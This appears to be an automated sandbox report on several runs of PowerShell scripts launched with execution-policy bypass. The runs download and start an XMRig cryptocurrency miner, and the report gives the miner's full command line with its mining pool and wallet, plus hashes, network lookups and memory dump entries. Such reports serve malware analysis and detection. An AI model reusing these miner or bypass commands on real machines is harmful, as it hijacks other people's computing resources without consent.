memory/964-108-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-109-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-110-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-111-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-112-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-113-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-114-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-115-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-116-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-117-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:51

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1782s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 89.16.208.104.in-addr.arpa udp

Files

memory/4564-0-0x00007FF9F0CD3000-0x00007FF9F0CD5000-memory.dmp

memory/4564-6-0x00000256C4690000-0x00000256C46B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zn4zooe1.1hf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4564-11-0x00007FF9F0CD0000-0x00007FF9F1791000-memory.dmp

memory/4564-12-0x00007FF9F0CD0000-0x00007FF9F1791000-memory.dmp

memory/4564-14-0x00007FF9F0CD0000-0x00007FF9F1791000-memory.dmp

memory/4564-16-0x00000256AC200000-0x00000256AC20A000-memory.dmp

memory/4564-15-0x00000256C4D00000-0x00000256C4D12000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2120-47-0x00000296931A0000-0x00000296931C0000-memory.dmp

memory/2120-48-0x00000296931F0000-0x0000029693210000-memory.dmp

memory/2120-49-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/4564-50-0x00007FF9F0CD3000-0x00007FF9F0CD5000-memory.dmp

memory/2120-51-0x0000029693210000-0x0000029693230000-memory.dmp

memory/2120-52-0x0000029693230000-0x0000029693250000-memory.dmp

memory/2120-53-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/4564-54-0x00007FF9F0CD0000-0x00007FF9F1791000-memory.dmp

memory/2120-55-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/4564-56-0x00007FF9F0CD0000-0x00007FF9F1791000-memory.dmp

memory/2120-57-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-59-0x0000029693230000-0x0000029693250000-memory.dmp

memory/2120-58-0x0000029693210000-0x0000029693230000-memory.dmp

memory/2120-60-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-61-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-62-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-63-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-64-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-65-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-66-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-67-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-68-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-69-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-70-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-71-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-72-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-73-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-74-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-75-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-76-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-77-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-78-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-79-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-80-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-81-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-82-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-83-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-84-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-85-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-86-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-87-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-88-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-89-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-90-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-91-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-92-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-93-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-94-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-95-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-96-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-97-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-98-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-99-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-100-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-101-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-102-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-103-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-104-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-105-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-106-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-107-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-108-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-109-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-110-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-111-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-112-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-113-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-114-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-115-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-116-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-117-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

memory/2120-118-0x00007FF71A9E0000-0x00007FF71B613000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:54

Platform

win10-20240404-en

Max time kernel

1794s

Max time network

1754s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 89.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/2668-3-0x00007FF9338A3000-0x00007FF9338A4000-memory.dmp

memory/2668-5-0x0000024C9FD80000-0x0000024C9FDA2000-memory.dmp

memory/2668-8-0x00007FF9338A0000-0x00007FF93428C000-memory.dmp

memory/2668-10-0x00007FF9338A0000-0x00007FF93428C000-memory.dmp

memory/2668-9-0x0000024CA00A0000-0x0000024CA0116000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wyn4ouob.nrd.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2668-25-0x00007FF9338A0000-0x00007FF93428C000-memory.dmp

memory/2668-48-0x0000024CA0070000-0x0000024CA0082000-memory.dmp

memory/2668-61-0x0000024CA0060000-0x0000024CA006A000-memory.dmp

memory/2668-62-0x0000024CA0020000-0x0000024CA0041000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1640-91-0x000001D048060000-0x000001D048080000-memory.dmp

memory/1640-93-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/2668-94-0x00007FF9338A0000-0x00007FF93428C000-memory.dmp

memory/2668-97-0x00007FF9338A3000-0x00007FF9338A4000-memory.dmp

memory/1640-96-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/2668-98-0x00007FF9338A0000-0x00007FF93428C000-memory.dmp

memory/2668-99-0x00007FF9338A0000-0x00007FF93428C000-memory.dmp

memory/1640-101-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-103-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-105-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-107-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-109-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-111-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-113-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-115-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-117-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-119-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-121-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-123-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-125-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-127-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-129-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-131-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-133-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-135-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-137-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-139-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-141-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-143-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-145-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-147-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-149-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-151-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-153-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-155-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-157-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:39

Platform

win7-20240508-en

Max time kernel

1558s

Max time network

1559s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Network

N/A

Files

memory/2848-4-0x000007FEF616E000-0x000007FEF616F000-memory.dmp

memory/2848-5-0x000000001B580000-0x000000001B862000-memory.dmp

memory/2848-7-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp

memory/2848-6-0x00000000022D0000-0x00000000022D8000-memory.dmp

memory/2848-8-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp

memory/2848-9-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp

memory/2848-10-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp

memory/2848-11-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp

memory/2848-12-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:46

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1785s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 27.178.89.13.in-addr.arpa udp

Files

memory/4872-0-0x00007FFADBFD3000-0x00007FFADBFD5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_knopigrb.3c2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4872-10-0x0000022330E90000-0x0000022330EB2000-memory.dmp

memory/4872-11-0x00007FFADBFD0000-0x00007FFADCA91000-memory.dmp

memory/4872-12-0x00007FFADBFD0000-0x00007FFADCA91000-memory.dmp

memory/4872-14-0x00007FFADBFD0000-0x00007FFADCA91000-memory.dmp

memory/4872-15-0x0000022349B10000-0x0000022349B22000-memory.dmp

memory/4872-16-0x0000022330EE0000-0x0000022330EEA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/936-47-0x000001F79EBC0000-0x000001F79EBE0000-memory.dmp

memory/936-49-0x000001F831160000-0x000001F831180000-memory.dmp

memory/4872-48-0x0000022349470000-0x000002234968C000-memory.dmp

memory/936-51-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/4872-52-0x00007FFADBFD0000-0x00007FFADCA91000-memory.dmp

memory/936-56-0x000001F8317D0000-0x000001F8317F0000-memory.dmp

memory/936-55-0x000001F8317B0000-0x000001F8317D0000-memory.dmp

memory/936-53-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/4872-54-0x00007FFADBFD3000-0x00007FFADBFD5000-memory.dmp

memory/4872-58-0x00007FFADBFD0000-0x00007FFADCA91000-memory.dmp

memory/936-57-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-59-0x00007FF649000000-0x00007FF649C33000-memory.dmp

